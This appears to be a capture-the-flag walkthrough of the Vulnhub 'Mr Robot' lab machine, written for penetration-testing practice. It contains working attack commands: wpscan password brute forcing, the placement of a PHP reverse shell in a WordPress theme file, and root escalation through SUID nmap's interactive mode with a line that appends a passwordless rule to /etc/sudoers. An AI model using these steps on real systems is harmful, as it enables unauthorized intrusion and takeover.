Mr Robot 1

Vulnhub virtual machine; OSCP prep box, tv-show themed box that offered traning on basic enumeration along with wpscan brute forcing which led to remote code execution. Upgrading via enumeration of kernel exploits left empty hands but pivoting to another user and getting “interactive” led us to root.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Vulnhub Link: https://www.vulnhub.com/entry/mr-robot-1,151/ File: mrRobot.ova (virtualbox)

Discover VM on network:

1
netdiscover -r 192.168.56.0/24

Target: 192.168.56.114

Enumeration

Nmap Scan:

1
nmap -sV -sC -oA nmap/mrrobot 192.168.56.114

Our standard line: HTTP & HTTPS web-servers along with a closed SSH.

Navigating to HTTP

very slick animations - let this education begin

same situation occurs over HTTPs. Ok, lets delve down this rabbit hole.

source:

we are not alone apparently - but on our vlan I can assure you we are.

Join -

hmm asked for an email address but I don’t have one setup on this box.

Checkout if robots.txt exists

it does. We found our first key.

key acquired.

Moving to download fsocity.dic

moved to directory and ran file

hmm an offset with an address is a different twist.

1
strings fsociety.dic

we now have a large dictionary of passwords

Passwords to what is the question.

More enumeration: Dirbuster:

wp-login.php this looks promising.

Navigating to location:

We have potiential passwords but no usernames. Our goal should be to enumerate as many usernames as possible.

wpscan

1
wpscan --enumerate --threads 20 --batch --log --url http:/192.168.56.114

a few vulnerabilities but nothing is standing off the page that will enumerate users.

seeing this is a theme based VM lets refresh the memory of the characters played on the show with a quick IMDB lookup:

Back to wordpress login with an attempt of generic login

result:

well it’s returning something at least. Attempting with elliot

result:

well elliot is a verified user on the box lets move to brute-force this login with wpscan

1
wpscan --log --batch --url 192.168.56.114 --wordlist /htb/mrrobot/fsocity.dic --username elliot --threads 20

hmm we have a lot of passwords to try. I remember seeing a few duplicates in the .dic lets prune and reattack.

Sorting duplicates in a file:

1
2
3
4
5
6
7
wc -l fsocity.dic
858160 fsocity.dic

sort -u fsocity.dic | wc -l
11451

sort -u fsociety.dic > fsocity_sorted.dic

fsocity_sorted.dic created with quite a bit less passwords to try.

wpsscan-brute force again:

1
wpscan --log --batch --url 192.168.56.114 --wordlist /htb/mrrobot/fsocity_sorted.dic --username elliot --threads 20

we now have elliot credentials!

Login:

we are not inside wordpress. The next move would be to upload a payload. We have php pages as so if we just take one over with our php reverse shell we should be able to initiate a call back.

On the wordpress admin dashboard > Appearance > editor > insert payload under 404.php.

RCE

Setting up listener:

navigate to http://192.168.56.114/404.php

we have captured a shell.

Checking the home folder and we find key-2-of-3.txt alongside a password.raw-md5 .

upgrade to tty:

1
python -c 'import pty; pty.spawn("/bin/bash")'

attempt sudo -l

yeilds nothing without the password. Next moving to enumerate box.

1
uname -a

Quick searchsploit for kernal vulnerabilies

1
searchsploit 3.13.0

priv-esc is exactly what we want.

download exploit to /dev/shm - memory trick

compile and execute

well, that would have just been too easy. Back to enumeration…

Back to /home/robot/ to check out that password.raw-md5

lets decode:

1
c3fcd3d76192e4007dfb496cca67e13b = abcdefghijklmnopqrstuvwxyz

thanks to: https://www.md5online.org/md5-decrypt.html

Switching user to robot

1
su robot

sudo check

1
sudo -l

Priv-esc/Root

Check for SUID:

1
find / -perm +6000 2> /dev/null

nmap has an suid. We can take advantage of this by prompting a “interactive”

1
/usr/local/bin/nmap --interactive

we are not executing commands as root!

Since we have robots password we’ll just make him a sudoers

1
! echo "robot ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers

we can no call an actual shell as root

1
sudo /bin/sh

Bring me the root!

-exec